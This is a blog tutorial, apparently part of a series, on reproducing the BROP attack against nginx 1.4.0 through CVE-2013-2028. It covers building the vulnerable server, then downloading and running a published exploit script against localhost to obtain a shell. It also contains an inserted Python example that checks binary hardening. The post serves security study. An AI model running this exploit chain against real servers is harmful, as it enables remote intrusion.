
    Blind Return Oriented Programming (BROP) Attack (2)

    Liu Yutao, posted on 2014-06-01 16:05:00

    This topic consists of 3 sessions:

    • BROP Principle - dump memory to attacker and do exploit
    • BROP Practice1 - attack conduct
    • BROP Practice2 - code analysis

    Blind Return Oriented Programming (BROP) Website

    Hacking Blind: paper and slide


    Following the 1st session, which covered the principle of the BROP attack, this page discusses how to carry out the real exploit on a Linux system.

    This session is more of a tutorial on how I reproduced, on my own PC, one of the 3 attacks conducted by the authors (specifically, attacking nginx 1.4.0 through a buffer overflow bug, CVE-2013-2028, and finally executing a shell).

    Setting Up Nginx-1.4.0

    First, we need to set up the server environment: nginx 1.4.0.

    Download the nginx 1.4.0 source code:

    $ wget nginx.org/download/nginx-1.4.0.tar.gz
    $ tar zxvf nginx-1.4.0.tar.gz
    $ cd nginx-1.4.0
    $ ./configure --sbin-path=/usr/local/nginx/nginx --conf-path=/usr/local/nginx/nginx.conf --pid-path=/usr/local/nginx/nginx.pid --with-http_ssl_module
    

    Before compiling, edit the generated Makefile so that it builds with stack canary protection (-fstack-protector):

    $ vi obj/Makefile

    ...
    CFLAGS = -pipe -O -W -Wall -Wpointer-arith -Wno-unused-parameter -Werror -g -fstack-protector
    ...

    Then compile it:

    $ make -j4
    $ sudo make install
    

    At this point, it is installed in the /usr/local/nginx folder. If you use checksec.sh to check it:

    $ wget www.trapkit.de/tools/checksec.sh
    $ chmod +x ./checksec.sh
    $ ./checksec.sh --file /usr/local/nginx/nginx
    

    You will get the following result:

    (screenshot: checksec.sh result)

    This means it already has NX and stack canary protection.
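    To see what checksec.sh is actually testing on the nginx binary, here is an added example (not from the post, the paper or checksec itself) that reads the ELF64 program headers directly and reports the same NX / canary / PIE / RELRO properties; the synthetic_elf helper, the constructed test image and the plain-bytes search for __stack_chk_fail are assumptions of this example.

```python
"""Minimal re-implementation of the checksec.sh hardening checks (added example)."""
import struct
import sys

PT_GNU_STACK = 0x6474E551  # program header that carries the stack permission bits
PT_GNU_RELRO = 0x6474E552  # program header marking the read-only-after-relocation region
PF_X = 0x1                 # segment flag: executable
ET_DYN = 3                 # e_type of a PIE executable (or a shared object)


def elf_hardening(data: bytes) -> dict:
    """Report NX, stack canary, PIE and RELRO status of a little-endian ELF64 image."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("expected a little-endian ELF64 file")
    e_type = struct.unpack_from("<H", data, 16)[0]
    e_phoff = struct.unpack_from("<Q", data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    nx, relro = False, False  # like checksec.sh: a missing GNU_STACK header counts as NX disabled
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)   # stack segment without the X bit means NX enabled
        elif p_type == PT_GNU_RELRO:
            relro = True
    return {
        "nx": nx,
        "canary": b"__stack_chk_fail" in data,  # heuristic: the canary failure handler is referenced
        "pie": e_type == ET_DYN,                 # ET_EXEC binaries keep gadgets at fixed addresses
        "relro": relro,
    }


def synthetic_elf(stack_flags: int, e_type: int, canary: bool) -> bytes:
    """Constructed ELF64 image with only GNU_STACK and GNU_RELRO headers, for offline testing."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)  # ELFCLASS64, little-endian, version 1
    header = ident + struct.pack("<HHIQQQIHHHHHH", e_type, 62, 1, 0, 64, 0, 0, 64, 56, 2, 64, 0, 0)
    phdrs = struct.pack("<IIQQQQQQ", PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)
    phdrs += struct.pack("<IIQQQQQQ", PT_GNU_RELRO, 4, 0, 0, 0, 0, 0, 1)
    return header + phdrs + (b"__stack_chk_fail\0" if canary else b"")


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else None  # e.g. /usr/local/nginx/nginx
    blob = open(path, "rb").read() if path else synthetic_elf(6, 2, True)
    for name, ok in elf_hardening(blob).items():
        print(f"{name:7s} {'enabled' if ok else 'DISABLED'}")
```

    Run it with the installed binary as the argument to compare against the checksec.sh output; without an argument it checks a constructed image that has NX, a canary and partial RELRO but no PIE.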

    Before running nginx, we need to modify its configuration to make it run with 4 worker processes:

    $ vi /usr/local/nginx/nginx.conf

    #user  nobody
    worker_processes 4;
    ...

    Then we just run it with:

    $ sudo /usr/local/nginx/nginx
    

    Exploit BROP Attack

    Now let’s see how to do the BROP attack. It is quite simple, since the authors have already written an nginx-specific attack script in Ruby.

    Download the exploit script:

    $ wget www.scs.stanford.edu/brop/nginx-1.4.0-exp.tgz
    $ tar zxvf nginx-1.4.0-exp.tgz
    $ cd nginx-1.4.0-exp
    

    And run it by simply executing:

    $ ./brop.rb 127.0.0.1
    

    If everything is OK, it will exploit nginx-1.4.0 using the approach I talked about here, and finally print the id of the exploited shell’s owner.

    If there is any problem and you want to rerun the script, first remove the state.bin file, or even restart nginx, and then run brop.rb again:

    $ rm -f ./state.bin
    $ ./brop.rb 127.0.0.1
    

    That’s done!


    In the following session, I will try to analyse the Ruby script and show how the attack is carried out at the code level.


